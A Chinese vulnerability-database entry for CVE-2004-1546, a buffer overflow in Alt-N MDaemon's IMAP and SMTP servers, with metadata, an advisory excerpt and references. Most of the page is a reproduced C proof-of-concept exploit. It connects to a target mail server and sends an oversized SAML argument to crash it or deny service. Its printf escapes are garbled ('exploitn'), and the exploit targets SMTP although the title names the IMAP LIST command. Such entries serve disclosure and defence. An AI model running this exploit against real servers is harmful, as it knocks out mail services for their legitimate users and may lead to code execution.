MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞

MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞

漏洞ID 1108175 漏洞类型 边界条件错误
发布时间 2004-09-16 更新时间 2005-10-20
图片[1]-MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1546
图片[2]-MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-419
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-419
|漏洞详情
Alt-NMDaemon是一款基于Windows的邮件服务程序。MDaemonIMAP服务程序对LIST命令处理缺少正确的缓冲区长度检查,远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击,可能以进程权限执行任意指令。MDaemonIMAP服务程序对LIST命令处理不正确,提交超长参数可导致缓冲区溢出,使程序崩溃,精心构建提交数据可能以进程权限执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/11238/info

Alt-N MDaemon is reportedly prone to multiple remote buffer overflow vulnerabilities. The vulnerabilities are likely due to a failure of the application to properly validate buffer sizes when processing command argument input.

By sending a large argument to certain SMTP commands or an IMAP command it is possible to cause this issue to present itself. Apparently, the application will not validate the size of the input before copying it into a finite buffer in process memory.

These issues can be leveraged to cause the affected process to crash, denying service to legitimate users. It is conjectured that these issues can also be leveraged to execute arbitrary code with the privileges of the user running the server on an affected computer.

/////////////////////////////////////////////////////////////
//        Remote DoS and proof-of-concept exploit          //
//                         for               		   //
//               Mdaemon smtp server v6.5.1                //
//	                   and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.        		   //
//                    Author: D_BuG.                       //
//                     [email protected]            		   //                
//                   Data: 16/09/2004        		   //
//                     NOT PUBLIC!                         //
//		      Greets:Rasco.                        // 
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
	
	{
	
	printf("Remote DoS and proof-of-concept(buffer overflow) exploitn");
	printf("                         for                              n");
	printf("Mdaemon smtp server v6.5.1 and possible other version.n");                    
	if(argc!=4)
	{
	printf("Usage: %s <IPADDRESS> <PORT> <TARGET>n",argv[0]);
	printf("Target:n1.DoS.n2.Proof-of-concept(buffer overflow).n");
	printf("e.g.:%s 192.168.1.1 25 1n",argv[0]);
	exit(-1);
	}


     	sa.sin_family=AF_INET;
	sa.sin_port=htons(atoi(argv[2]));
	if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
	printf("Error inet_ptonn");
		
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	
	printf("[~]Connecting...n");
	
	if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
	{
	printf("[-]Connect filed....nExit...n");
	exit(-1);
	}

int len=247;
	
if(atoi(argv[3])==2)
{
len++;
}
	
char szBuffer[len+7];
char buff[len];
char send[]="EHLO testern";
char send3[]="RCPT TO postmastern";
char rcv[1024];
int i;
for(i=0;i<len;i++)
    {
    buff[i]=0x41;
    }
    
sprintf(szBuffer,"SAML %sn",buff);

		printf("[+]Ok!n");
		sleep(2);
		printf("[~]Get banner...n");
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		    
		if(strstr(rcv,"220")==NULL)
		{
		printf("[-]Failed!n");
		}
		else
		{ 
		printf("[+]Ok!n");
    		}
								 
		printf("[~]Send EHLO...n");
		write(sock,send,sizeof(send)-1);
		sleep(2);
		memset(rcv,0,1024);
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		
		if(strstr(rcv,"250")==NULL)
		{
		printf("[-]Failed...n");
		}
		else
		{
		printf("[+]Ok!n");
		}
		printf("[~]Send SAML...n");
		write(sock,szBuffer,strlen(szBuffer));//Send SAML
		sleep(2);
		memset(rcv,0,1024);
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		
		if(strstr(rcv,"250")==NULL)
		{
		printf("[-]Exploit failed...please check your version Mdaemon!n");
		printf("[-]Exit...n");
		exit(-1);
		}
		printf("[+]Ok!n");
		
		printf("[~]Send RCPT...nn");
		write(sock,send3,sizeof(send3)-1);//Send RCPT
		sleep(2);
		if(atoi(argv[3])==2)
		{
		printf("[+]Crash service.....n");
		}
		else
		{
		printf("[+]DoS service.....n");
		}
		printf("[~]Done.n");
		
		close(sock);
		
return 0;

}
|参考资料

来源:XF
名称:mdaemon-smtp-bo(17477)
链接:http://xforce.iss.net/xforce/xfdb/17477
来源:BID
名称:11238
链接:http://www.securityfocus.com/bid/11238
来源:FULLDISC
名称:20040922RemotebufferoverflowinMDaemonIMAPandSMTPserver
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026770.html
来源:XF
名称:mdaemon-imap-list-bo(17476)
链接:http://xforce.iss.net/xforce/xfdb/17476
来源:www.securitylab.ru
链接:http://www.securitylab.ru/48146.html
来源:OSVDB
名称:10224
链接:http://www.osvdb.org/10224
来源:OSVDB
名称:10223
链接:http://www.osvdb.org/10223
来源:BUGTRAQ
名称:20040922RemotebufferoverflowinMDaemonIMAPandSMTPserver
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109591179510781&w;=2
来源:NSFOCUS
名称:6949※6948
链接:http://www.nsfocus.net/vulndb/6949※6948

相关推荐: Apache mod_cookies Buffer Overflow Vulnerability

Apache mod_cookies Buffer Overflow Vulnerability 漏洞ID 1105103 漏洞类型 Unknown 发布时间 1997-01-12 更新时间 1997-01-12 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享